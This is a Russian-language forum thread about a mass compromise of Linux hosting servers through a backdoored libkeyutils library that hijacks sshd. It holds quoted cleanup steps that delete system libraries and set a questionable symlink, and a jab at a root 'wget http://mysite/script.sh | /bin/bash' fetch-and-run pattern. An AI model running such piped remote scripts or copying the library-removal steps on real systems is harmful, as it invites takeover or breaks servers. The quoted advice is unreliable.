А то как-то смешно получается - какой-то серьёзный эксплоит по слухам, а ломают только каких-то чайников законченных с полупустыми хостингами. :) Тут или какой-то левый реп (который за несколько дней так и не нашли), или как обычно, всё благодаря windows. Или вообще чистый фейк, много шума из ничего. И, главное - никто ничего не знает, никто проблему не локализовал, и никто особо не чешется. Хотелось бы хоть что-то осязаемое увидеть, чтобы понять, из-за чего наши кефирчики всё пытаются возбудиться.
>[оверквотинг удален]
> пользователей windows через windows-троян, и весь взлом - благодаря нашей любимой
> самой безопасной и защищённой ОС).
> А то как-то смешно получается - какой-то серьёзный эксплоит по слухам, а
> ломают только каких-то чайников законченных с полупустыми хостингами. :) Тут или
> какой-то левый реп (который за несколько дней так и не нашли),
> или как обычно, всё благодаря windows. Или вообще чистый фейк, много
> шума из ничего. И, главное - никто ничего не знает, никто
> проблему не локализовал, и никто особо не чешется. Хотелось бы хоть
> что-то осязаемое увидеть, чтобы понять, из-за чего наши кефирчики всё пытаются
> возбудиться.http://ru-linux.livejournal.com/2917308.html#comments
тут тоже видимо зря все обсуждают. и выпукают бюлетени на всяких официальных сайтах..
Как же ты интересуешся - если кроме линки из заголовка страницы ничего не нашел?
>[оверквотинг удален]
> пользователей windows через windows-троян, и весь взлом - благодаря нашей любимой
> самой безопасной и защищённой ОС).
> А то как-то смешно получается - какой-то серьёзный эксплоит по слухам, а
> ломают только каких-то чайников законченных с полупустыми хостингами. :) Тут или
> какой-то левый реп (который за несколько дней так и не нашли),
> или как обычно, всё благодаря windows. Или вообще чистый фейк, много
> шума из ничего. И, главное - никто ничего не знает, никто
> проблему не локализовал, и никто особо не чешется. Хотелось бы хоть
> что-то осязаемое увидеть, чтобы понять, из-за чего наши кефирчики всё пытаются
> возбудиться.ау! буратинка.. есть что ответить на ссылки?
> ау! буратинка.. есть что ответить на ссылки?Всё уже отвечено до нас. Очередной руткит, поражающий только людей с windows и windows-привычками. В этот раз даже какой-то особенно тихий по повреждениям, и шумный по истерике. Это не уязвимость, это безалаберность.
Если 100000 человек завтра выставят пустой пароль на root, потому что прочитают об этом в свежем номере "Мурзилка Гламур", это тоже не будет уязвимость. Нет такой технологии, которая давала бы пользователю всё и при этом защищала бы его от самого себя - иначе это уже не власть.
>> ау! буратинка.. есть что ответить на ссылки?
> Всё уже отвечено до нас. Очередной руткит, поражающий только людей с windows
> и windows-привычками. В этот раз даже какой-то особенно тихий по повреждениям,
> и шумный по истерике. Это не уязвимость, это безалаберность.да да :-) только при безалаберности в Windows - ты первый кричишь о уязвимостях. А тут стыдливо прикрываешся. Пиши еще - все уже поняли какой из тебя специалист :-)
Проблемы с оборудованием? тогда жопа...
ребят, если кто прочитал ту ветку на вебхостингтолк целиком, можно вкратце пересказать факты? а то после того как на 7й странице стали выяснять кому из них нужно завести подружку мне читать уже надоело, да и остальная дискуссия представляет собой слепое тыкание в никуда..
если кратко:
- ломают независимо от того где висит ССХ и видин ли он наружу (т.е. ССХ скорее всего ни при чем): "Its unlikely its ssh, found a box that had the file but ssh was disabled with a hw firewall."
- фильтровать ССХ файерволом иммет смысл для предотвращения спамаАлгоритм чистки:
1. SSH to server
2. Run 'updatedb'
3. Run 'locate libkeyutils.so.1.9'Please follow the steps below to clear the expliot.
1. SSH to the server
2. cd /lib64/
3. rm libkeyutils.so.1.9
4. rm libkeyutils.so.1
5. ln -s libkeyutils.so.1 libkeyutils.so.1.3
6. Restart ssh
7. yum update kernel and Reboot to close any active connections
> если кратко:А также: подозрение на эскалацию прав а редхатах: https://access.redhat.com/security/cve/CVE-2013-0871
Ну то-есть, вполне может быть нечто такое:
- Ломают вебню, благо, панельки для хостинга от мутных контор доверия не внушают, а их то обладатели и вопят как раз.
- Грейдят права до рута через упомянутый баг
- Получив оные вкатывают руткитец для маскировки под пенька.
да,наверное что-то подобное, просто жевание насчет sshd там сбивает,
sshd с бэкдором это последствия, а не причина, ну и CVE по ядру достаточно свеж, чтобы активно им пользоваться для эксплуатации найденных дыр на вебсайтах, уже неважно каких,
одно дело взломать непривилегированный акк и поломать сайты, другое - надежно повесить забэкдоренный sshd и получить гораздо больше и на более долгий срок, ну а сколько вислоухих его не найдут пока им хостер не надерет уши это ж и не сосчитать ;)
всем спасибо за краткое резюме 50 с лишним страниц )
>[оверквотинг удален]
> 2. Run 'updatedb'
> 3. Run 'locate libkeyutils.so.1.9'
> Please follow the steps below to clear the expliot.
> 1. SSH to the server
> 2. cd /lib64/
> 3. rm libkeyutils.so.1.9
> 4. rm libkeyutils.so.1
> 5. ln -s libkeyutils.so.1 libkeyutils.so.1.3
> 6. Restart ssh
> 7. yum update kernel and Reboot to close any active connectionsУ кого-то есть linux запущенный с audit программой?
Вкратце:на куче RPM-based систем с хостинговыми панельками и похапе святым духом с uid=0 нормальная либа подменяется на забэкдоренную.
все, больше ничего конкретного нет (не считая деталей по бэкдору в либе).
остальное - это обмен на вебхостинге б.м. остроумными рецептами hack-proofing, вопросы "а у меня есть либа libkeyutils1.so - это оно? меня похачели?" и какой-то клоун, который по всем форумам, куда дотягивается, постит l33t SSH 0DaY Xpl0et.
а да и вот советы по вычищению бэкдоренной либы. не хватает пункта "вставить этот скрипт в крон".
> не хватает пункта "вставить этот скрипт в крон".:-D :-D :-D
> "вставить этот скрипт в крон".учитывая что там wget http://mysite/script.sh | /bin/bash от рута
товарищ имеет неплохие шансы на немаленький ботнетик, просто заменив сей скриптец на что-то ему удобное ;)
> Третий день в Сети наблюдается массовый взлом серверов на базе Linux.Истерично как-то звучит. Сколько тысяч? Что-то мало в нете об этом.
предлагаю удалить споры Linux vs ... и пр.
ветку читать невозможно, а тролли совсем ошизели
> предлагаю удалить споры Linux vs ... и пр.
> ветку читать невозможно, а тролли совсем ошизелиМожете помочь:
- игнорированием таковых;
- ссылкой "сообщить модератору";
- предложением Максиму помочь с модерированием.
судя по тому, что у меня на общедоступных LAMP-серверах НЕ используются панели, не используется cgi/перл, не используется proftpd, ssh общедоступен и при этом всё чисто, в качестве виновника я бы в первую очередь думал о каком-нибудь suid-perl (панельки) или proftpd (так горячо любимом хостинг-провайдерами).
не думаю, что это php - он у меня есть.
Нда ... походу чисто пшик ...2Администрация
Реквестирую фичу на opennete для скрывания отдельных комментов ... Хорошо бы ещё по имени запостившего. А то продираться через все эти Linux vs BSD, GPL vs BSD напрягает уже ...
> к тому же те у кого все работает по форумам не ходят,
> и тем более не пишут в комментахТо-то я смотрю, по форумам ходят и в комментах пишут те, у кого ничего не работает и никогда не работало...
Мда. Короче, мне надоело уже быть тут самым умным. Мне больше нравится общество, где я самый глупый, и где от каждого первого можно чему-то научиться, и где можно с удовольствием слушать. А сюда уже приличные и компентные люди заходить скоро перестанут.Я думаю, стоит вообще floss, gpl и подобное объявить вне закона, и преобразовать форум в открытый чемпионат России по мерянию известного предмета. Потому что по факту так оно и есть. Всё это очень глупо, товарищи - так себе, как очнётесь, и передайте.
> А сюда уже приличные и компентные люди заходить скоро перестанут.Ну, политика портала может и поменяться. Нужно просто обуздать школопедов с их чухнёй, подойти более жёстко к модерированию комментов к новостям, изменив соотв. образом правила "форума". Сложного ничего нет, только волевое желание владельца.
> Всё это очень глупо, товарищи - так себе, как очнётесь, и передайте.
Это - да, если поток херни не прикратится, то профи точно суда не пойдут. ИМХО, надо "подрулить" формат Опеннета. Тогда он "расцветёт".
Не думаю, что тут что-то можно сделать. Купили все достижения за зеркальца и бусы, наши им сами всё вынесли.Мы, конечно, победим, потому что мы - это мы :), но какой ценой и какими потерями будет достигнута эта победа...
> ... но какой
> ценой и какими потерями будет достигнута эта победа...http://ru.wikipedia.org/wiki/%D0%9F%D0%B...
Для дальнейшего изучения:
http://yandex.ru/yandsearch?text=%D0%B8%D1�...
Тем временем дрвеб решил попиариться
http://news.drweb.com/show/?i=3332&lng=ru&c=14
> Тем временем дрвеб решил попиаритьсяА Евгений Валентиновий упустил возможность?
Да пиар-то очень сомнительный. Статейка очень слабая, если сравнить с Операцией 'Red October' и разборами Flame.
+1 у меня сломали сервак =(
> +1 у меня сломали сервак =(что, вынули из стойки и уронили? бывает.
> +1 у меня сломали сервак =(-1
> +1 у меня сломали сервак =(А у меня -- нет...
